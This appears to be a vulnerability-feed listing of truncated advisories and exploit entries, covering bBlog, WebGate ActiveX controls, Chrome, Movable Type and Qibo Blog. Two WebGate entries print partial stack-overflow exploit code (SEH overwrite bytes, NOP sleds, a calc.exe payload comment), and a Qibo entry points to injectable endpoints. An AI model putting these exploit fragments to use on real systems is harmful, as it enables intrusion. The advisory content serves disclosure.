bBlog Cross-Site Request Forgery Vulnerability

bBlog is a PHP-based blogging program that supports plugin extensions, spam filtering, and more. A cross-site request forgery vulnerability exists in bBlog. A remote attacker can exploit this vulnerability to perform unauthorized operations...

WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow

WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...

Critical vulnerabilities in JSON Web Token libraries

More info at https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/...

KLA10524 Multiple vulnerabilities in Google Chrome

Multiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code or have other unknown impact. Below is a complete list of vulnerabilities 1. Improper IPC interaction handling can be exploited...

Google Releases Security Update for Chrome

Google has released Chrome 41.0.2272.118 for Windows, Mac, and Linux to address multiple vulnerabilities. Exploitation of one of these vulnerabilities could allow a remote attacker to take control of an affected system. US-CERT encourages users and administrators to review the Google Chrome blog...

DDoS Attack Against GitHub Continues After More Than Four Days

More than four days after it began, the massive DDoS attack on GitHub is still ongoing. The attack has evolved significantly since it started and GitHub officials said they believe that the goal of the operation is to force the site to remove some specific content. In the evening hours of March 2...

WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow

var buff1 = ""; var arg2=1; var arg3=1; var arg4=1; var nops = ""; var buff2 = ""; for i=0;i24; i++ buff1 += "B"; // jump over seh to shellcode nseh = "\xeb\x08PD"; // pop pop ret var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; //calc.exe payload sc =...

Hulihan Applications Amethyst HTML Injection Vulnerability

Hulihan Applications Amethyst is a U.S. Hulihan Applications, Inc. based on Ruby on Rails a set of open-source Web application framework based on the Ruby language of the open-source blog application . An HTML injection vulnerability exists in Hulihan Applications Amethyst, which stems from the...

Qibo Blog 1.0 /blog/require/ajax/ol_module.php 本地文件包含漏洞

/blog/require/ajax/olmodule.phpif$step==2 $uid=$lfjuid; @include"template/space/module/$moduleid.php"; /ÐÂÔö¼ÓµÄÄ£¿éʹ֮¿ÉÒÔÍÏÀ­/ //$ThisModule$moduleid=strreplace'class="head"','class="head" onMouseOver="Drag.inint;"',$ThisModule$moduleid; if!$ThisModule$moduleid...

Vulnerability in the Dropbox SDK for Android (CVE-2014-8889)

Hi, We have recently discovered a vulnerability in the Dropbox SDK for Android. This vulnerability may enable theft of sensitive information from apps that use the vulnerable Dropbox SDK both locally by malware and also remotely by using drive-by exploitation techniques. The vulnerability is...

Restricted blog post visible in the month summary page

Steps to reproduce: 1. create a new blog post, and restrict it to yourself 2. log in as another user and go to Blogs in sidebar 3. blog is not visible in the blogs summary page 4. click a visible blog in the same month 5. click the month link in the breadcrumb 5. restricted blog title and excerpt...

Restricted blog post visible in the month summary page

Steps to reproduce: 1. create a new blog post, and restrict it to yourself 2. log in as another user and go to Blogs in sidebar 3. blog is not visible in the blogs summary page 4. click a visible blog in the same month 5. click the month link in the breadcrumb 5. restricted blog title and excerpt...

Restricted blog post visible in the month summary page

Steps to reproduce: 1. create a new blog post, and restrict it to yourself 2. log in as another user and go to Blogs in sidebar 3. blog is not visible in the blogs summary page 4. click a visible blog in the same month 5. click the month link in the breadcrumb 5. restricted blog title and excerpt...

Debian DSA-3183-1 : movabletype-opensource - security update

Multiple vulnerabilities have been discovered in Movable Type, a blogging system. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2013-2184 Unsafe use of Storable::thaw in the handling of comments to blog posts could allow remote attackers to include and...

Microsoft Windows Shell LNK Code Execution

This module exploits a vulnerability in the MS10-046 patch to abuse again the handling of Windows Shortcut files .LNK that contain an icon resource pointing to a malicious DLL. This creates an SMB resource to provide the payload and the trigger, and generates a LNK file which must be sent to the...

Qibo Blog 1.0 /blog/member/update_sort.php SQL注入漏洞

No description provided by source...

Qibo Blog 1.0 /blog/ajax.php SQL注入漏洞

No description provided by source...

Qibo Blog 1.0 /blog/ajax.php 远程密码修改漏洞

No description provided by source...

Internet Bug Bounty: Heap overflow in H. Spencer’s regex library on 32 bit systems

The IBB's programs provide a great incentive for me to find vulnerabilities in open source software. With this one I set out to find a vulnerability in PHP and discovered that the vulnerability that I found exists in a wider constellation of applications, including BSD libc's. IBB's Alex Rice's...

齐博博客系统高危漏洞集合(SQL+XSS)

简要描述： 该博客系统是一个类似博客大巴的公共博客平台 两个高危注入+一个可打管理员账号的xss 最新的blog 1.0 http://down.qibosoft.com/down.php?v=blog1.0 详细说明： http://localhost/qibo/bk/blog/member/postlog.php?job=postlog 注册成会员之后发布日志 注入一 问题代码\blog\member\postlog.php if$job=="postlog" if$step==2 if!$title showerr"标题不能为空"; elseif!$content...